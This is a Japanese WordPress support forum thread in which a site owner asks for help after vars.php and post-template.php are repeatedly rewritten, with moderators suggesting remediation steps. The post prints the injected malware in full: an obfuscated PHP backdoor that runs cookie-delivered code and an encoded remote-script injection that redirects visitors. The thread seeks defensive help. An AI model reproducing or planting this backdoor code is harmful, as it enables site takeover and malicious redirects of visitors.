サポート » 使い方全般 » vars.phpとpost-template.phpへのスパム?

  • 【現象】
    vars.phpとpost-template.phpへのスパムだと思います。
    /wp-includes/vars.php、post-template.phpが勝手に書き換えられて非常に困ってます。

    【調べてみました】
    ・googleで以下のワードで検索しましたが、全くヒットしません。
    「wordpress vars.php スパム」、「wordpress vars.php コード 勝手に挿入される」

    ・海外のフォーラムに同じ事象の投稿がありましたが、(なぜかキャッシュですが)まだ未回答のままかと思います。
    http://webcache.googleusercontent.com/search?q=cache:yLngLEOr3gsJ:https://wordpress.org/support/topic/code-is-injected-in-varsphp+&cd=1&hl=ja&ct=clnk&gl=jp

    【挿入されるコード】
    【vars.phpに挿入されるコード】
    ==============================================================================

    function sdec($inp) {
    	$keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    	$chr1 = $chr2 = $chr3 = "";
    	$enc1 = $enc2 = $enc3 = $enc4 = "";
    	$i = 0;
    	$out = "";
    	$inp = preg_replace("[^A-Za-z0-9\+\/\=]", "", $inp);
    	do {
    		$enc1 = strpos($keyStr, substr($inp, $i++, 1));
    		$enc2 = strpos($keyStr, substr($inp, $i++, 1));
    		$enc3 = strpos($keyStr, substr($inp, $i++, 1));
    		$enc4 = strpos($keyStr, substr($inp, $i++, 1));
    		$chr1 = ($enc1 << 2) | ($enc2 >> 4);
    		$chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
    		$chr3 = (($enc3 & 3) << 6) | $enc4;
    		$out = $out . chr((int) $chr1);
    		if ($enc3 != 64) {
    			$out = $out . chr((int) $chr2);
    		}
    		if ($enc4 != 64) {
    			$out = $out . chr((int) $chr3);
    		}
    		$chr1 = $chr2 = $chr3 = "";
    		$enc1 = $enc2 = $enc3 = $enc4 = "";
    	} while ($i < strlen($inp));
    	return $out;
    }
    
    if(substr(md5(reset($_COOKIE)), 0, 12)=='bc446faa565e' && count($_COOKIE)>3) {
    	$k = substr(md5(reset($_COOKIE), true), 0, 6).substr(md5(reset($_COOKIE), true), -6);
    	$ko = substr(md5(reset($_COOKIE)), -12);
    	$lmf = str_rot13(str_replace('c', '', 'pecrncgr_cshcacpgcvbac'));
    	$vlm = $lmf('$t,$k','$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;');
    	ob_start();
    	array_diff_ukey(@array('1'=>1), @array('2'=>2), $lmf('', @gzuncompress(@$vlm(@sdec(preg_replace(array("/_/","/-/"),array("/","+"),join(array_slice($_COOKIE,count($_COOKIE)-3)))),$k))));
    	$o=ob_get_contents();
    	ob_end_clean();
    	$d=base64_encode($vlm(gzcompress($o),$k));
    	print("\x3c$ko\x3e$d\x3c\x2f$ko\x3e");
    }

    【post-template.phpに挿入されるコード】
    ==============================================================================

    function wp_scripts_method() {
    	wp_enqueue_script( 'jquery-lcr', gzuncompress(base64_decode('eJzT189JLUlOLMrXqzAyySjSS87P1c8q1k/OLy1JLdLLKgYAtu4LdA==')), array(), "\x32\x2e\x30\x2e\x31\x26\x74\x3d".time());
    }
    add_action( 'wp_enqueue_scripts', 'wp_scripts_method');

    ただし、私が見つけられた怪しいと思われるコードは以上で、
    他のファイルにも書き込まれているかもしれません。

    【環境】
    ホスティング:さくらサーバー
    wordpress:4.3
    使用しているテーマ:twentytwelve

    【取ってみた対策(ダメでしたが)】
    wordpressをインストールする際に
    一般的にセキュリティ効果のあるとされているパーミッションに変更
    .htaccess    604
    wp-config.php  404
    他ディレクトリ 705
    他ファイル   604

    wordpressを新規にダウンロードし、ファイルを差し替えてパーミッションを
    http://wpdocs.osdn.jp/Hardening_WordPressのファイルパーミッションを参考に変更いたしました。

    上記対策を行った上でこれ以上どのような対策をとればいいのか
    検討がつきません。

    =====================================

    なんども書き換えられる事からどっかのセキュリティーホールが空きっぱなしという事も思ったりするのですが、どうしたらいいでしょうか?

    モデレーター編集: フォーラムカテゴリーを『【重要】 お読みください』から『使い方全般』へ移動。『【重要】 お読みください』はフォーラム運営上のお知らせを掲載するカテゴリーです。一般の投稿は内容に合ったその他のカテゴリーへ投稿してください。]

6件の返信を表示中 - 1 - 6件目 (全6件中)
  • モデレーター のむらけい (Kei Nomura)

    (@mypacecreator)

    FTPアカウント自体がやられてる可能性もあるので、パスワードを変えたり新規アカウントを作って古いのは消したり、そういう対応ってされましたか?

    それと念のため、さくらインターネットのサポートへも報告しておいたほうが良いと思います。
    何か情報がもらえるかもしれませんので。

    全く同じ状況ではないと思いますが、こちらの情報も参考にどうぞ。
    https://ja.forums.wordpress.org/topic/8839?replies=5

    スレッド開始 bsmaile

    (@bsmaile)

    >FTPアカウント自体がやられてる可能性
    失礼しました。一番最初にその対策をやってますが記載もれしてました。
    FTPとかサクラの管理ページからは無いと思います。

    >さくらインターネットのサポート
    こちらにも報告済みですが
    「サクラサーバが推奨するワードプレスプラグインを入れてください」というアナウンスだけでした。それは本日しましたが、明日どうなってるか?わかりません。

    スレッド開始 bsmaile

    (@bsmaile)

    「サクラサーバが推奨するワードプレスプラグイン」を入れてて昨日は来なかったのでこれで大丈夫かな?と思ってたのですが、全然ダメでした。

    本日同様のコードが同様のファイルに入ってました。

    まったく解決方法がわかりません。大変困ってます。

    必要な事は全部書きますのでなんとか解消方法を教えてください。。。。

    スレッド開始 bsmaile

    (@bsmaile)

    あ、現象を書いてなかったです。すいません。

    ワードプレスサイトにアクセスしたときに、海外のサイトに飛ばされるかもしくはエラーとなります。

    ワードプレスにこのコードが入ると(だと思うんですが、このコードでないのか?どうかもよくわかってないです。)

    ・現象1

    ユーザーがワードプレスのページにアクセスした際に
    絶対に確実ではないんですが、時と場合によって以下のURLに飛ばされます。
    (こちらでは2つ確認しましたが、もっとあるかもしれません。ランダムっぽいですが
    スマホでアクセスした時の方が飛ばされる率が高いです)

    (バッククォートで囲ってるURLに飛ばされます)

    j p . b o n g a c a m s.c o m/
    (このURL後に?に続き長めの文字列が記載されたURLです)
    
    c d n . t o p - o f f e r s - h e . r e / d a t i n g / n e x t / m s t r / 8 / i n d e x . h t m l
    (このURL後に?に続き長めの文字列が記載されたURLです)
    (なぜかURL半角だと投稿できないので全角にてスペースを入れて書きました)

    ・現象2

    そして時間がたつとこのコードはvars.phpに同じ内容のものが、追加されていくんですが
    それが2つ以上になると、サイトがエラーになりアクセスできなくなります。

    本当に困ってます
    どうぞよろしくお願い申し上げます。m(_ _)m

    モデレーター のむらけい (Kei Nomura)

    (@mypacecreator)

    「サクラサーバが推奨するワードプレスプラグイン」の内容が分からないので一旦スルーしますが、
    テーマやプラグインに不審なものが埋め込まれているなどはないですか?
    すべてのファイルをスキャンして調べてみてください。
    お使いのPCの感染や、WordPressのユーザーが乗っ取られているケースもあるかもしれません。

    いずれにせよ、いったんサイト自体の公開を止めたほうがよいでしょう。
    踏み台にしてほかのサイトに被害が及ぶ可能性もあります。

    そのうえで、現状で侵入経路が特定できていないので、サーバのログを見るなども必要かと思います。

    加えて、セキュリティの専門家に相談するなど、こういった公のフォーラムではサポートできない部分は個別のアドバイスを仰ぐことも場合によってはご検討ください。

    スレッド開始 bsmaile

    (@bsmaile)

    どなたか、このページに書いてる事を要約できないでしょうか?
    多分似た現象の事を書いてるようなですが、解決できたのか?どうかわかりません。
    これは解決してるんでしょうか?どなたかお分かりになれば教えてください。
    https://wordpress.org/support/topic/fatal-error-cannot-redeclare-sdec-2?replies=7

    >テーマやプラグインに不審なものが埋め込まれているなどはないですか?
    >すべてのファイルをスキャンして調べてみてください。
    一応しております。問題なしです。

    >お使いのPCの感染や、WordPressのユーザーが乗っ取られているケースもあるかもしれません。

    こちらも一番最初にしております問題なしです。ユーザーはadminは残してません。かなりややこしいのにしております。

    >いずれにせよ、いったんサイト自体の公開を止めたほうがよいでしょう。
    >踏み台にしてほかのサイトに被害が及ぶ可能性もあります。

    それができたら、、、いいんですけど、、

    >そのうえで、現状で侵入経路が特定できていないので、サーバのログを見るなども必要かと思います。

    現在見てる所です。

    >加えて、セキュリティの専門家に相談するなど、こういった公のフォーラムではサポートできない部分は個別のアドバイスを仰ぐことも場合によってはご検討ください。

    了解ですが、どこに相談していいやら全く分かりません。

6件の返信を表示中 - 1 - 6件目 (全6件中)
  • トピック「vars.phpとpost-template.phpへのスパム?」には新たに返信することはできません。